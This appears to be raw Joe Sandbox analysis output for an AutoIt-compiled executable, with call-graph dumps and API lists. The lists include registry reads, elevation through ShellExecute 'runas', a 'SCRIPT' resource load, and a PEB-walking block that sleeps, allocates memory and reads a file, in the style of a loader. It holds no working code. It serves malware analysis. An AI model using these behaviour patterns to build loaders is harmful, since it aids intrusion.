97039 232dee 97037->97039 97038->96920 97039->97038 97040 2322ce 79 API calls 97039->97040 97040->97038 97041->96934 97042->96938 97043->96944 97044->96953 97045->96962 97046 1c1033 97051 1c4c91 97046->97051 97050 1c1042 97052 1ca961 22 API calls 97051->97052 97053 1c4cff 97052->97053 97059 1c3af0 97053->97059 97056 1c4d9c 97057 1c1038 97056->97057 97062 1c51f7 22 API calls __fread_nolock 97056->97062 97058 1e00a3 29 API calls __onexit 97057->97058 97058->97050 97063 1c3b1c 97059->97063 97062->97056 97064 1c3b29 97063->97064 97065 1c3b0f 97063->97065 97064->97065 97066 1c3b30 RegOpenKeyExW 97064->97066 97065->97056 97066->97065 97067 1c3b4a RegQueryValueExW 97066->97067 97068 1c3b6b 97067->97068 97069 1c3b80 RegCloseKey 97067->97069 97068->97069 97069->97065 97070 16854b8 97084 1683108 97070->97084 97072 1685573 97087 16853a8 97072->97087 97074 168559c CreateFileW 97076 16855eb 97074->97076 97077 16855f0 97074->97077 97077->97076 97078 1685607 VirtualAlloc 97077->97078 97078->97076 97079 1685625 ReadFile 97078->97079 97079->97076 97080 1685640 97079->97080 97081 16843a8 13 API calls 97080->97081 97082 1685673 97081->97082 97083 1685696 ExitProcess 97082->97083 97083->97076 97090 1686598 GetPEB 97084->97090 97086 1683793 97086->97072 97088 16853b1 Sleep 97087->97088 97089 16853bf 97088->97089 97091 16865c2 97090->97091 97091->97086 97092 1c1cad SystemParametersInfoW 97093 213f75 97104 1dceb1 97093->97104 97095 213f8b 97096 214006 97095->97096 97113 1de300 23 API calls 97095->97113 97099 1cbf40 235 API calls 97096->97099 97098 213fe6 97101 214052 97098->97101 97114 231abf 22 API calls 97098->97114 97099->97101 97102 214a88 97101->97102 97115 23359c 82 API calls __wsopen_s 97101->97115 97105 1dcebf 97104->97105 97106 1dced2 97104->97106 97116 1caceb 23 API calls messages 97105->97116 97107 1dcf05 97106->97107 97108 1dced7 97106->97108 97117 1caceb 23 API calls messages 97107->97117 97110 1dfddb 22 API calls 97108->97110 97112 1dcec9 97110->97112 97112->97095 97113->97098 97114->97096 97115->97102 97116->97112 97117->97112 97118 1c1044 97123 1c10f3 97118->97123 97120 1c104a 97159 1e00a3 29 API calls __onexit 97120->97159 97122 1c1054 97160 1c1398 97123->97160 97127 1c116a 97128 1ca961 22 API calls 97127->97128 97129 1c1174 97128->97129 97130 1ca961 22 API calls 97129->97130 97131 1c117e 97130->97131 97132 1ca961 22 API calls 97131->97132 97133 1c1188 97132->97133 97134 1ca961 22 API calls 97133->97134 97135 1c11c6 97134->97135 97136 1ca961 22 API calls 97135->97136 97137 1c1292 97136->97137 97170 1c171c 97137->97170 97141 1c12c4 97142 1ca961 22 API calls 97141->97142 97143 1c12ce 97142->97143 97144 1d1940 9 API calls 97143->97144 97145 1c12f9 97144->97145 97191 1c1aab 97145->97191 97147 1c1315 97148 1c1325 GetStdHandle 97147->97148 97149 202485 97148->97149 97150 1c137a 97148->97150 97149->97150 97151 20248e 97149->97151 97153 1c1387 OleInitialize 97150->97153 97152 1dfddb 22 API calls 97151->97152 97154 202495 97152->97154 97153->97120 97198 23011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97154->97198 97156 20249e 97199 230944 CreateThread 97156->97199 97158 2024aa CloseHandle 97158->97150 97159->97122 97200 1c13f1 97160->97200 97163 1c13f1 22 API calls 97164 1c13d0 97163->97164 97165 1ca961 22 API calls 97164->97165 97166 1c13dc 97165->97166 97167 1c6b57 22 API calls 97166->97167 97168 1c1129 97167->97168 97169 1c1bc3 6 API calls 97168->97169 97169->97127 97171 1ca961 22 API calls 97170->97171 97172 1c172c 97171->97172 97173 1ca961 22 API calls 97172->97173 97174 1c1734 97173->97174 97175 1ca961 22 API calls 97174->97175 97176 1c174f 97175->97176 97177 1dfddb 22 API calls 97176->97177 97178 1c129c 97177->97178 97179 1c1b4a 97178->97179 97180 1c1b58 97179->97180 97181 1ca961 22 API calls 97180->97181 97182 1c1b63 97181->97182 97183 1ca961 22 API calls 97182->97183 97184 1c1b6e 97183->97184 97185 1ca961 22 API calls 97184->97185 97186 1c1b79 97185->97186 97187 1ca961 22 API calls 97186->97187 97188 1c1b84 97187->97188 97189 1dfddb 22 API calls 97188->97189 97190 1c1b96 RegisterWindowMessageW 97189->97190 97190->97141 97192 1c1abb 97191->97192 97193 20272d 97191->97193 97194 1dfddb 22 API calls 97192->97194 97207 233209 23 API calls 97193->97207 97196 1c1ac3 97194->97196 97196->97147 97197 202738 97198->97156 97199->97158 97208 23092a 28 API calls 97199->97208 97201 1ca961 22 API calls 97200->97201 97202 1c13fc 97201->97202 97203 1ca961 22 API calls 97202->97203 97204 1c1404 97203->97204 97205 1ca961 22 API calls 97204->97205 97206 1c13c6 97205->97206 97206->97163 97207->97197 97209 1f8402 97214 1f81be 97209->97214 97213 1f842a 97219 1f81ef try_get_first_available_module 97214->97219 97216 1f83ee 97233 1f27ec 26 API calls _abort 97216->97233 97218 1f8343 97218->97213 97226 200984 97218->97226 97219->97219 97222 1f8338 97219->97222 97229 1e8e0b 40 API calls 2 library calls 97219->97229 97221 1f838c 97221->97222 97230 1e8e0b 40 API calls 2 library calls 97221->97230 97222->97218 97232 1ef2d9 20 API calls _abort 97222->97232 97224 1f83ab 97224->97222 97231 1e8e0b 40 API calls 2 library calls 97224->97231 97234 200081 97226->97234 97228 20099f 97228->97213 97229->97221 97230->97224 97231->97222 97232->97216 97233->97218 97235 20008d __FrameHandler3::FrameUnwindToState 97234->97235 97236 20009b 97235->97236 97238 2000d4 97235->97238 97291 1ef2d9 20 API calls _abort 97236->97291 97245 20065b 97238->97245 97239 2000a0 97292 1f27ec 26 API calls _abort 97239->97292 97244 2000aa __fread_nolock 97244->97228 97246 200678 97245->97246 97247 2006a6 97246->97247 97248 20068d 97246->97248 97294 1f5221 97247->97294 97308 1ef2c6 20 API calls _abort 97248->97308 97251 200692 97309 1ef2d9 20 API calls _abort 97251->97309 97252 2006ab 97253 2006b4 97252->97253 97254 2006cb 97252->97254 97310 1ef2c6 20 API calls _abort 97253->97310 97307 20039a CreateFileW 97254->97307 97258 2000f8 97293 200121 LeaveCriticalSection __wsopen_s 97258->97293 97259 2006b9 97311 1ef2d9 20 API calls _abort 97259->97311 97260 200781 GetFileType 97263 2007d3 97260->97263 97264 20078c GetLastError 97260->97264 97262 200756 GetLastError 97313 1ef2a3 20 API calls 2 library calls 97262->97313 97316 1f516a 21 API calls 3 library calls 97263->97316 97314 1ef2a3 20 API calls 2 library calls 97264->97314 97265 200704 97265->97260 97265->97262 97312 20039a CreateFileW 97265->97312 97269 20079a CloseHandle 97269->97251 97272 2007c3 97269->97272 97271 200749 97271->97260 97271->97262 97315 1ef2d9 20 API calls _abort 97272->97315 97273 2007f4 97275 200840 97273->97275 97317 2005ab 72 API calls 4 library calls 97273->97317 97280 20086d 97275->97280 97318 20014d 72 API calls 4 library calls 97275->97318 97276 2007c8 97276->97251 97279 200866 97279->97280 97281 20087e 97279->97281 97282 1f86ae __wsopen_s 29 API calls 97280->97282 97281->97258 97283 2008fc CloseHandle 97281->97283 97282->97258 97319 20039a CreateFileW 97283->97319 97285 200927 97286 200931 GetLastError 97285->97286 97287 20095d 97285->97287 97320 1ef2a3 20 API calls 2 library calls 97286->97320 97287->97258 97289 20093d 97321 1f5333 21 API calls 3 library calls 97289->97321 97291->97239 97292->97244 97293->97244 97295 1f522d __FrameHandler3::FrameUnwindToState 97294->97295 97322 1f2f5e EnterCriticalSection 97295->97322 97297 1f5234 97298 1f5259 97297->97298 97301 1f52c7 EnterCriticalSection 97297->97301 97304 1f527b 97297->97304 97326 1f5000 21 API calls 3 library calls 97298->97326 97301->97304 97305 1f52d4 LeaveCriticalSection 97301->97305 97302 1f525e 97302->97304 97327 1f5147 EnterCriticalSection 97302->97327 97303 1f52a4 __fread_nolock 97303->97252 97323 1f532a 97304->97323 97305->97297 97307->97265 97308->97251 97309->97258 97310->97259 97311->97251 97312->97271 97313->97251 97314->97269 97315->97276 97316->97273 97317->97275 97318->97279 97319->97285 97320->97289 97321->97287 97322->97297 97328 1f2fa6 LeaveCriticalSection 97323->97328 97325 1f5331 97325->97303 97326->97302 97327->97304 97328->97325 97329 1c2de3 97330 1c2df0 __wsopen_s 97329->97330 97331 1c2e09 97330->97331 97332 202c2b ___scrt_fastfail 97330->97332 97333 1c3aa2 23 API calls 97331->97333 97334 202c47 GetOpenFileNameW 97332->97334 97335 1c2e12 97333->97335 97336 202c96 97334->97336 97345 1c2da5 97335->97345 97338 1c6b57 22 API calls 97336->97338 97340 202cab 97338->97340 97340->97340 97342 1c2e27 97363 1c44a8 97342->97363 97346 201f50 __wsopen_s 97345->97346 97347 1c2db2 GetLongPathNameW 97346->97347 97348 1c6b57 22 API calls 97347->97348 97349 1c2dda 97348->97349 97350 1c3598 97349->97350 97351 1ca961 22 API calls 97350->97351 97352 1c35aa 97351->97352 97353 1c3aa2 23 API calls 97352->97353 97354 1c35b5 97353->97354 97355 2032eb 97354->97355 97356 1c35c0 97354->97356 97360 20330d 97355->97360 97398 1dce60 41 API calls 97355->97398 97358 1c515f 22 API calls 97356->97358 97359 1c35cc 97358->97359 97392 1c35f3 97359->97392 97362 1c35df 97362->97342 97364 1c4ecb 94 API calls 97363->97364 97365 1c44cd 97364->97365 97366 203833 97365->97366 97368 1c4ecb 94 API calls 97365->97368 97367 232cf9 80 API calls 97366->97367 97370 203848 97367->97370 97369 1c44e1 97368->97369 97369->97366 97371 1c44e9 97369->97371 97372 203869 97370->97372 97373 20384c 97370->97373 97374 203854 97371->97374 97375 1c44f5 97371->97375 97377 1dfe0b 22 API calls 97372->97377 97376 1c4f39 68 API calls 97373->97376 97406 22da5a 82 API calls 97374->97406 97405 1c940c 136 API calls 2 library calls 97375->97405 97376->97374 97391 2038ae 97377->97391 97380 1c2e31 97381 203862 97381->97372 97382 1c4f39 68 API calls 97385 203a5f 97382->97385 97383 1ca4a1 22 API calls 97383->97391 97385->97382 97410 22989b 82 API calls __wsopen_s 97385->97410 97388 1c9cb3 22 API calls 97388->97391 97391->97383 97391->97385 97391->97388 97399 1c3ff7 97391->97399 97407 22967e 22 API calls __fread_nolock 97391->97407 97408 2295ad 42 API calls _wcslen 97391->97408 97409 230b5a 22 API calls 97391->97409 97393 1c3605 97392->97393 97397 1c3624 __fread_nolock 97392->97397 97395 1dfe0b 22 API calls 97393->97395 97394 1dfddb 22 API calls 97396 1c363b 97394->97396 97395->97397 97396->97362 97397->97394 97398->97355 97401 1c400a 97399->97401 97403 1c40ae 97399->97403 97400 1c403c 97400->97403 97404 1dfddb 22 API calls 97400->97404 97401->97400 97402 1dfe0b 22 API calls 97401->97402 97402->97400 97403->97391 97404->97400 97405->97380 97406->97381 97407->97391 97408->97391 97409->97391 97410->97385

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 234 1c42de-1c434d call 1ca961 GetVersionExW call 1c6b57 239 203617-20362a 234->239 240 1c4353 234->240 241 20362b-20362f 239->241 242 1c4355-1c4357 240->242 243 203631 241->243 244 203632-20363e 241->244 245 1c435d-1c43bc call 1c93b2 call 1c37a0 242->245 246 203656 242->246 243->244 244->241 247 203640-203642 244->247 263 1c43c2-1c43c4 245->263 264 2037df-2037e6 245->264 250 20365d-203660 246->250 247->242 249 203648-20364f 247->249 249->239 252 203651 249->252 253 203666-2036a8 250->253 254 1c441b-1c4435 GetCurrentProcess IsWow64Process 250->254 252->246 253->254 258 2036ae-2036b1 253->258 256 1c4494-1c449a 254->256 257 1c4437 254->257 260 1c443d-1c4449 256->260 257->260 261 2036b3-2036bd 258->261 262 2036db-2036e5 258->262 269 1c444f-1c445e LoadLibraryA 260->269 270 203824-203828 GetSystemInfo 260->270 271 2036ca-2036d6 261->271 272 2036bf-2036c5 261->272 265 2036e7-2036f3 262->265 266 2036f8-203702 262->266 263->250 273 1c43ca-1c43dd 263->273 267 203806-203809 264->267 268 2037e8 264->268 265->254 277 203704-203710 266->277 278 203715-203721 266->278 279 2037f4-2037fc 267->279 280 20380b-20381a 267->280 276 2037ee 268->276 281 1c449c-1c44a6 GetSystemInfo 269->281 282 1c4460-1c446e GetProcAddress 269->282 271->254 272->254 274 203726-20372f 273->274 275 1c43e3-1c43e5 273->275 285 203731-203737 274->285 286 20373c-203748 274->286 283 1c43eb-1c43ee 275->283 284 20374d-203762 275->284 276->279 277->254 278->254 279->267 280->276 287 20381c-203822 280->287 289 1c4476-1c4478 281->289 282->281 288 1c4470-1c4474 GetNativeSystemInfo 282->288 290 203791-203794 283->290 291 1c43f4-1c440f 283->291 292 203764-20376a 284->292 293 20376f-20377b 284->293 285->254 286->254 287->279 288->289 294 1c447a-1c447b FreeLibrary 289->294 295 1c4481-1c4493 289->295 290->254 298 20379a-2037c1 290->298 296 203780-20378c 291->296 297 1c4415 291->297 292->254 293->254 294->295 296->254 297->254 299 2037c3-2037c9 298->299 300 2037ce-2037da 298->300 299->254 300->254
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 001C430D
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • GetCurrentProcess.KERNEL32(?,0025CB64,00000000,?,?), ref: 001C4422
                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 001C4429
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001C4454
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001C4466
                                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001C4474
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 001C447B
                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 001C44A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                  • API String ID: 3290436268-3101561225
                                                                                  • Opcode ID: 3178a65e6072f8ecc8b5e1f739ff0d9895ecf01588fc3ef3ec491bfa75dca128
                                                                                  • Instruction ID: 1bcb950255ff11b5445592e41f269954d70337c9b184e1240a78b3c98e19d72c
                                                                                  • Opcode Fuzzy Hash: 3178a65e6072f8ecc8b5e1f739ff0d9895ecf01588fc3ef3ec491bfa75dca128
                                                                                  • Instruction Fuzzy Hash: A3A1836591E3C2DFC716CBBB7C496A57FB86B36300B1854DEE44193A62D3308568CB2D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1171 1c42a2-1c42ba CreateStreamOnHGlobal 1172 1c42bc-1c42d3 FindResourceExW 1171->1172 1173 1c42da-1c42dd 1171->1173 1174 1c42d9 1172->1174 1175 2035ba-2035c9 LoadResource 1172->1175 1174->1173 1175->1174 1176 2035cf-2035dd SizeofResource 1175->1176 1176->1174 1177 2035e3-2035ee LockResource 1176->1177 1177->1174 1178 2035f4-203612 1177->1178 1178->1174
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001C50AA,?,?,00000000,00000000), ref: 001C42B2
                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001C50AA,?,?,00000000,00000000), ref: 001C42C9
                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20), ref: 002035BE
                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20), ref: 002035D3
                                                                                  • LockResource.KERNEL32(001C50AA,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20,?), ref: 002035E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                  • String ID: SCRIPT
                                                                                  • API String ID: 3051347437-3967369404
                                                                                  • Opcode ID: d9ed4171fb28caf3811e57841b49b855aff4ea73ff314d0c2ff09f9063f307f3
                                                                                  • Instruction ID: 4f77f5dfb070916a224390a03b874aee8f9f6e495c157482f4f222b7fd3740da
                                                                                  • Opcode Fuzzy Hash: d9ed4171fb28caf3811e57841b49b855aff4ea73ff314d0c2ff09f9063f307f3
                                                                                  • Instruction Fuzzy Hash: 31117C70200701BFD7218B65EC49F677BB9EBD5B52F20416DB846D62A0EB71D800D621

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001C2B6B
                                                                                    • Part of subcall function 001C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00291418,?,001C2E7F,?,?,?,00000000), ref: 001C3A78
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00282224), ref: 00202C10
                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,00282224), ref: 00202C17
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                  • String ID: runas
                                                                                  • API String ID: 448630720-4000483414
                                                                                  • Opcode ID: efd84fa30af653424b5e650298d9b6f7cd731a91ddf2aeb7caee1a6e0bbaf409
                                                                                  • Instruction ID: 2a63e728df6990bd688aad43aee223388ce3b6fa295390bba608b14be994ff1f
                                                                                  • Opcode Fuzzy Hash: efd84fa30af653424b5e650298d9b6f7cd731a91ddf2aeb7caee1a6e0bbaf409
                                                                                  • Instruction Fuzzy Hash: CD11B431208345ABC714FF60E855F7EB7A4ABB5300F44542DF052570A2DF30C96A8752
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,00205222), ref: 0022DBCE
                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 0022DBDD
                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 0022DBEE
                                                                                  • FindClose.KERNEL32(00000000), ref: 0022DBFA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2695905019-0
                                                                                  • Opcode ID: 1db6b55dd2c2ff5e36fdefb85b66d381113cce706d232a348ffe4b0b32f6d84c
                                                                                  • Instruction ID: 76998a69e8800a0fd6fe73b316d56790087c1e6b8c7e19aecccea2301631f31e
                                                                                  • Opcode Fuzzy Hash: 1db6b55dd2c2ff5e36fdefb85b66d381113cce706d232a348ffe4b0b32f6d84c
                                                                                  • Instruction Fuzzy Hash: E9F0A730420B206B82206FBCBC0D46A376C9E01336B604703F835D10E0FBB05964C599
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: p#)
                                                                                  • API String ID: 3964851224-1470848591
                                                                                  • Opcode ID: 7ee6d00b417633778de672fcad90752fde9b68509d0ec21c595be39c008b3df0
                                                                                  • Instruction ID: abb936e9e8e0749ed875a696db4b58b898da8ec3c7b935b1b3e2ebe307bb6f10
                                                                                  • Opcode Fuzzy Hash: 7ee6d00b417633778de672fcad90752fde9b68509d0ec21c595be39c008b3df0
                                                                                  • Instruction Fuzzy Hash: 31A27970608341DFD714CF28C480B6ABBE1BFA9304F15896DE98A8B352D771ED95CB92
                                                                                  APIs
                                                                                  • GetInputState.USER32 ref: 001CD807
                                                                                  • timeGetTime.WINMM ref: 001CDA07
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB28
                                                                                  • TranslateMessage.USER32(?), ref: 001CDB7B
                                                                                  • DispatchMessageW.USER32(?), ref: 001CDB89
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB9F
                                                                                  • Sleep.KERNEL32(0000000A), ref: 001CDBB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                  • String ID:
                                                                                  • API String ID: 2189390790-0
                                                                                  • Opcode ID: c625339ab2ee04fd01d80801a341d889fa220c26086f2ebcaba9c408460dd9a3
                                                                                  • Instruction ID: 55acb26d985cd7ec339e81921a74d97d4c81d97f615e49b8da3909ab1a562de2
                                                                                  • Opcode Fuzzy Hash: c625339ab2ee04fd01d80801a341d889fa220c26086f2ebcaba9c408460dd9a3
                                                                                  • Instruction Fuzzy Hash: 5E42E330618342EFD728CF24E849FAAB7E0BF66304F15456EF45587291D770E8A8CB92

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001C2D07
                                                                                  • RegisterClassExW.USER32(00000030), ref: 001C2D31
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001C2D42
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 001C2D5F
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001C2D6F
                                                                                  • LoadIconW.USER32(000000A9), ref: 001C2D85
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001C2D94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: af01b952168500d14eb1f3786789e612a8c3163eb5b0e66b1d5f0102ae115ea7
                                                                                  • Instruction ID: 52e5e28e23f766e678b1fb6528765c3664bfce7b3b385c6f843be640775ab4fa
                                                                                  • Opcode Fuzzy Hash: af01b952168500d14eb1f3786789e612a8c3163eb5b0e66b1d5f0102ae115ea7
                                                                                  • Instruction Fuzzy Hash: FF21E3B1951309AFEB00DFA5EC4DBDDBBB8FB08701F20411AF911A62A0E7B14554CF98

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 302 20065b-20068b call 20042f 305 2006a6-2006b2 call 1f5221 302->305 306 20068d-200698 call 1ef2c6 302->306 312 2006b4-2006c9 call 1ef2c6 call 1ef2d9 305->312 313 2006cb-200714 call 20039a 305->313 311 20069a-2006a1 call 1ef2d9 306->311 322 20097d-200983 311->322 312->311 320 200781-20078a GetFileType 313->320 321 200716-20071f 313->321 326 2007d3-2007d6 320->326 327 20078c-2007bd GetLastError call 1ef2a3 CloseHandle 320->327 324 200721-200725 321->324 325 200756-20077c GetLastError call 1ef2a3 321->325 324->325 331 200727-200754 call 20039a 324->331 325->311 329 2007d8-2007dd 326->329 330 2007df-2007e5 326->330 327->311 341 2007c3-2007ce call 1ef2d9 327->341 334 2007e9-200837 call 1f516a 329->334 330->334 335 2007e7 330->335 331->320 331->325 344 200847-20086b call 20014d 334->344 345 200839-200845 call 2005ab 334->345 335->334 341->311 352 20086d 344->352 353 20087e-2008c1 344->353 345->344 351 20086f-200879 call 1f86ae 345->351 351->322 352->351 354 2008e2-2008f0 353->354 355 2008c3-2008c7 353->355 358 2008f6-2008fa 354->358 359 20097b 354->359 355->354 357 2008c9-2008dd 355->357 357->354 358->359 361 2008fc-20092f CloseHandle call 20039a 358->361 359->322 364 200931-20095d GetLastError call 1ef2a3 call 1f5333 361->364 365 200963-200977 361->365 364->365 365->359
                                                                                  APIs
                                                                                    • Part of subcall function 0020039A: CreateFileW.KERNELBASE(00000000,00000000,?,00200704,?,?,00000000,?,00200704,00000000,0000000C), ref: 002003B7
                                                                                  • GetLastError.KERNEL32 ref: 0020076F
